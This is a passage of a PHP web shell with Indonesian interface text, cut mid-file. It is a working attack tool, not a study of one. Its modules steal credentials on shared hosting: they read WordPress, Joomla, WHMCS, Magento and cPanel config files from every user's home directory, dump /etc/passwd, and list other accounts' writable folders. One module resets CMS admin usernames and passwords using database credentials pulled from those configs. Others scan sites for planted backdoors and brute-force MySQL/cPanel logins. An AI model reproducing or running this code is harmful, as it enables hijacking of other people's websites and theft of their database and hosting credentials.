  2760.                     "/home2/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2761.                     "/home2/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2762.                     "/home2/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2763.                     "/home2/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2764.                     "/home2/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2765.                     "/home2/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2766.                     "/home2/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2767.                     "/home2/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2768.                     "/home2/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2769.                     "/home2/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2770.                     "/home2/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2771.                     "/home2/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2772.                     "/home2/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2773.                     "/home2/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2774.                     "/home2/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2775.                     "/home2/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2776.                     "/home2/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2777.                     "/home2/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2778.                     "/home2/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2779.                     "/home2/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2780.                     "/home2/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2781.                     "/home2/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2782.                     "/home2/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2783.                     "/home2/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2784.                     "/home2/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2785.                     "/home2/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2786.                     "/home3/$user_chonx/.my.cnf" => "cpanel",
  2787.                     "/home3/$user_chonx/.accesshash" => "WHM-accesshash",
  2788.                     "/home3/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2789.                     "/home3/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2790.                     "/home3/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2791.                     "/home3/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2792.                     "/home3/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2793.                     "/home3/$user_chonx/public_html/forum/config.php" => "phpBB",
  2794.                     "/home3/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2795.                     "/home3/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2796.                     "/home3/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2797.                     "/home3/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2798.                     "/home3/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2799.                     "/home3/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2800.                     "/home3/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2801.                     "/home3/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2802.                     "/home3/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2803.                     "/home3/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2804.                     "/home3/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2805.                     "/home3/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2806.                     "/home3/$user_chonx/public_html/configuration.php" => "Joomla",                
  2807.                     "/home3/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2808.                     "/home3/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2809.                     "/home3/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2810.                     "/home3/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2811.                     "/home3/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2812.                     "/home3/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2813.                     "/home3/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2814.                     "/home3/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2815.                     "/home3/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2816.                     "/home3/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2817.                     "/home3/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2818.                     "/home3/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2819.                     "/home3/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2820.                     "/home3/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2821.                     "/home3/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2822.                     "/home3/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2823.                     "/home3/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2824.                     "/home3/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2825.                     "/home3/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2826.                     "/home3/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2827.                     "/home3/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2828.                     "/home3/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2829.                     "/home3/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2830.                     "/home3/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2831.                     "/home3/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2832.                     "/home3/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2833.                     "/home3/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2834.                     "/home3/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2835.                     "/home3/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2836.                     "/home3/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2837.                     "/home3/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2838.                     "/home3/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2839.                     "/home3/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2840.                     "/home3/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2841.                     "/home3/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2842.                     "/home3/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2843.                     "/home3/$user_chonx/public_html/wp-config.php" => "WordPress",
  2844.                     "/home3/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2845.                     "/home3/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2846.                     "/home3/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2847.                     "/home3/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2848.                     "/home3/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2849.                     "/home3/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2850.                     "/home3/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2851.                     "/home3/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2852.                     "/home3/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2853.                     "/home3/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2854.                     "/home3/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2855.                     "/home3/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2856.                     "/home3/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2857.                     "/home3/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2858.                     "/home3/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2859.                     "/home3/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2860.                     "/home3/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2861.                     "/home3/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2862.                     "/home3/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2863.                     "/home3/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2864.                     "/home3/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2865.                     "/home3/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2866.                     "/home3/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2867.                     "/home3/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2868.                     "/home3/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2869.                     "/home3/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2870.                     "/home3/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2871.                     "/home3/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2872.                     "/home3/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2873.                     "/home3/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2874.                     "/home3/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2875.                     "/home3/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2876.                     "/home3/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2877.                     "/home3/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2878.                     "/home3/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2879.                     "/home3/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal"                 
  2880.                         ); 
  2881.                     foreach($grab_config as $config => $nama_config) {
  2882.                         $ambil_config = file_get_contents($config);
  2883.                         if($ambil_config == '') {
  2884.                         } else {
  2885.                             $file_config = fopen("viewcg/$user_chonx-$nama_config.txt","w");
  2886.                             fputs($file_config,$ambil_config);
  2887.                         }
  2888.                     }
  2889.                 }      
  2890.             }
  2891.             echo "<center><a href='?dir=$dir/viewcg'><font color=lime>Done</font></a></center>";
  2892.             }else{
  2893.                
  2894.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2895.         echo file_get_contents('/etc/passwd');
  2896.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2897.         }
  2898. } elseif($_GET['do'] == 'jumping') {
  2899.     $i = 0;
  2900.     echo "<pre><div class='margin: 5px auto;'>";
  2901.     $etc = fopen("/etc/passwd", "r");
  2902.     while($passwd = fgets($etc)) {
  2903.         if($passwd == '' || !$etc) {
  2904.             echo "<font color=red>Can't read /etc/passwd</font>";
  2905.         } else {
  2906.             preg_match_all('/(.*?):x:/', $passwd, $user);
  2907.             foreach($user[1] as $users) {
  2908.                 $user_dir = "/home/$users/backupwordpress/";
  2909.                 if(is_readable($user_dir)) {
  2910.                     $i++;
  2911.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress</font></a><br>";
  2912.                     if(is_writable($user_dir)) {
  2913.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress/</font></a><br>";
  2914.                     }
  2915.                     echo $jrw;
  2916.                     $domain_jump = file_get_contents("/etc/named.conf");   
  2917.                     if($domain_jump == '') {
  2918.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2919.                     } else {
  2920.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2921.                         foreach($domains_jump[1] as $dj) {
  2922.                             $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2923.                             $user_url = $user_url['name'];
  2924.                             if($user_url == $users) {
  2925.                                 echo " => ( <u>$dj</u> )<br>";
  2926.                                 break;
  2927.                             }
  2928.                         }
  2929.                     }
  2930.                 }
  2931.             }
  2932.         }
  2933.     }
  2934.     if($i == 0) {
  2935.     } else {
  2936.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2937.     }
  2938.     echo "</div></pre>";
  2939. } elseif($_GET['do'] == 'auto_edit_user') {
  2940.     if($_POST['hajar']) {
  2941.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2942.             echo "username atau password harus lebih dari 6 karakter";
  2943.         } else {
  2944.             $user_baru = $_POST['user_baru'];
  2945.             $pass_baru = md5($_POST['pass_baru']);
  2946.             $conf = $_POST['config_dir'];
  2947.             $scan_conf = scandir($conf);
  2948.             foreach($scan_conf as $file_conf) {
  2949.                 if(!is_file("$conf/$file_conf")) continue;
  2950.                 $config = file_get_contents("$conf/$file_conf");
  2951.                 if(preg_match("/JConfig|joomla/",$config)) {
  2952.                     $dbhost = ambilkata($config,"host = '","'");
  2953.                     $dbuser = ambilkata($config,"user = '","'");
  2954.                     $dbpass = ambilkata($config,"password = '","'");
  2955.                     $dbname = ambilkata($config,"db = '","'");
  2956.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2957.                     $prefix = $dbprefix."users";
  2958.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2959.                     $db = mysql_select_db($dbname);
  2960.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2961.                     $result = mysql_fetch_array($q);
  2962.                     $id = $result['id'];
  2963.                     $site = ambilkata($config,"sitename = '","'");
  2964.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2965.                     echo "Config => ".$file_conf."<br>";
  2966.                     echo "CMS => Joomla<br>";
  2967.                     if($site == '') {
  2968.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2969.                     } else {
  2970.                         echo "Sitename => $site<br>";
  2971.                     }
  2972.                     if(!$update OR !$conn OR !$db) {
  2973.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2974.                     } else {
  2975.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2976.                     }
  2977.                     mysql_close($conn);
  2978.                 } elseif(preg_match("/WordPress/",$config)) {
  2979.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2980.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2981.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2982.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2983.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2984.                     $prefix = $dbprefix."users";
  2985.                     $option = $dbprefix."options";
  2986.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2987.                     $db = mysql_select_db($dbname);
  2988.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2989.                     $result = mysql_fetch_array($q);
  2990.                     $id = $result[ID];
  2991.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2992.                     $result2 = mysql_fetch_array($q2);
  2993.                     $target = $result2[option_value];
  2994.                     if($target == '') {
  2995.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2996.                     } else {
  2997.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2998.                     }
  2999.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3000.                     echo "Config => ".$file_conf."<br>";
  3001.                     echo "CMS => Wordpress<br>";
  3002.                     echo $url_target;
  3003.                     if(!$update OR !$conn OR !$db) {
  3004.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3005.                     } else {
  3006.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3007.                     }
  3008.                     mysql_close($conn);
  3009.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3010.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3011.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3012.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3013.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3014.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3015.                     $prefix = $dbprefix."admin_user";
  3016.                     $option = $dbprefix."core_config_data";
  3017.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3018.                     $db = mysql_select_db($dbname);
  3019.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3020.                     $result = mysql_fetch_array($q);
  3021.                     $id = $result[user_id];
  3022.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3023.                     $result2 = mysql_fetch_array($q2);
  3024.                     $target = $result2[value];
  3025.                     if($target == '') {
  3026.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3027.                     } else {
  3028.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3029.                     }
  3030.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3031.                     echo "Config => ".$file_conf."<br>";
  3032.                     echo "CMS => Magento<br>";
  3033.                     echo $url_target;
  3034.                     if(!$update OR !$conn OR !$db) {
  3035.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3036.                     } else {
  3037.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3038.                     }
  3039.                     mysql_close($conn);
  3040.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3041.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3042.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3043.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3044.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3045.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3046.                     $prefix = $dbprefix."user";
  3047.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3048.                     $db = mysql_select_db($dbname);
  3049.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3050.                     $result = mysql_fetch_array($q);
  3051.                     $id = $result[user_id];
  3052.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3053.                     if($target == '') {
  3054.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3055.                     } else {
  3056.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3057.                     }
  3058.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3059.                     echo "Config => ".$file_conf."<br>";
  3060.                     echo "CMS => OpenCart<br>";
  3061.                     echo $url_target;
  3062.                     if(!$update OR !$conn OR !$db) {
  3063.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3064.                     } else {
  3065.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3066.                     }
  3067.                     mysql_close($conn);
  3068.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3069.                     $dbhost = ambilkata($config,'server = "','"');
  3070.                     $dbuser = ambilkata($config,'username = "','"');
  3071.                     $dbpass = ambilkata($config,'password = "','"');
  3072.                     $dbname = ambilkata($config,'database = "','"');
  3073.                     $prefix = "users";
  3074.                     $option = "identitas";
  3075.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3076.                     $db = mysql_select_db($dbname);
  3077.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3078.                     $result = mysql_fetch_array($q);
  3079.                     $target = $result[alamat_website];
  3080.                     if($target == '') {
  3081.                         $target2 = $result[url];
  3082.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3083.                         if($target2 == '') {
  3084.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3085.                         } else {
  3086.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  3087.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3088.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3089.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3090.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3091.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3092.                             } else {
  3093.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3094.                             }
  3095.                         }
  3096.                     } else {
  3097.                         $cek_login = file_get_contents("$target/adminweb/");
  3098.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3099.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3100.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3101.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3102.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3103.                         } else {
  3104.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3105.                         }
  3106.                     }
  3107.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3108.                     echo "Config => ".$file_conf."<br>";
  3109.                     echo "CMS => Lokomedia<br>";
  3110.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3111.                         echo $url_target2;
  3112.                     } else {
  3113.                         echo $url_target;
  3114.                     }
  3115.                     if(!$update OR !$conn OR !$db) {
  3116.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3117.                     } else {
  3118.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3119.                     }
  3120.                     mysql_close($conn);
  3121.                 }
  3122.             }
  3123.         }
  3124.     } else {
  3125.         echo "<center>
  3126.         <h1>Auto Edit User Config</h1>
  3127.         <form method='post'>
  3128.         DIR Config: <br>
  3129.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3130.         Set User & Pass: <br>
  3131.         <input type='text' name='user_baru' value='faisa69' placeholder='user_baru'><br>
  3132.         <input type='text' name='pass_baru' value='faisa69' placeholder='pass_baru'><br>
  3133.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3134.         </form>
  3135.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3136.         ";
  3137.     }
  3138. }elseif($_GET['do'] == 'shelscan') {
  3139.     echo'<center><h2>Shell Finder</h2>
  3140. <form action="" method="post">
  3141. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3142. <br>
  3143. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  3144. </form><br>';
  3145. if (isset($_POST["scan"])) {  
  3146. $url = $_POST['traget'];
  3147. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3148. echo "Result :<br />";
  3149. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3150. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3151. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3152. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3153. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3154. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3155. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3156. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3157. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3158. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3159. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3160. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3161. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3162. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3163. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3164. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3165. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3166. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3167. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3168. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3169. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3170. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3171. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3172. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3173. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","chonx.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3174. foreach ($shells as $shell){
  3175. $headers = get_headers("$url$shell"); //
  3176. if (eregi('200', $headers[0])) {
  3177. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3178. $dz = fopen('shells.txt', 'a+');
  3179. $suck = "$url$shell";
  3180. fwrite($dz, $suck."\n");
  3181. }
  3182. }
  3183. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3184. }
  3185.    
  3186. }
  3187.  elseif($_GET['do'] == 'cpanel') {
  3188.     if($_POST['crack']) {
  3189.         $usercp = explode("\r\n", $_POST['user_cp']);
  3190.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3191.         $i = 0;
  3192.         foreach($usercp as $ucp) {
  3193.             foreach($passcp as $pcp) {
  3194.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3195.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3196.                     } else {
  3197.                         $_SESSION[$ucp] = "1";
  3198.                         $_SESSION[$pcp] = "1";
  3199.                         $i++;
  3200.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3201.                     }
  3202.                 }
  3203.             }
  3204.         }
  3205.         if($i == 0) {
  3206.         } else {
  3207.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>Janchonx</font>";
  3208.         }
  3209.     } else {
  3210.         echo "<center>
  3211.         <form method='post'>
  3212.         USER: <br>
  3213.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3214.         $_usercp = fopen("/etc/passwd","r");
  3215.         while($getu = fgets($_usercp)) {
  3216.             if($getu == '' || !$_usercp) {
  3217.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3218.             } else {
  3219.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3220.                 foreach($u[1] as $user_cp) {
  3221.                         if(is_dir("/home/$user_cp/public_html")) {
  3222.                             echo "$user_cp\n";
  3223.                     }
  3224.                 }
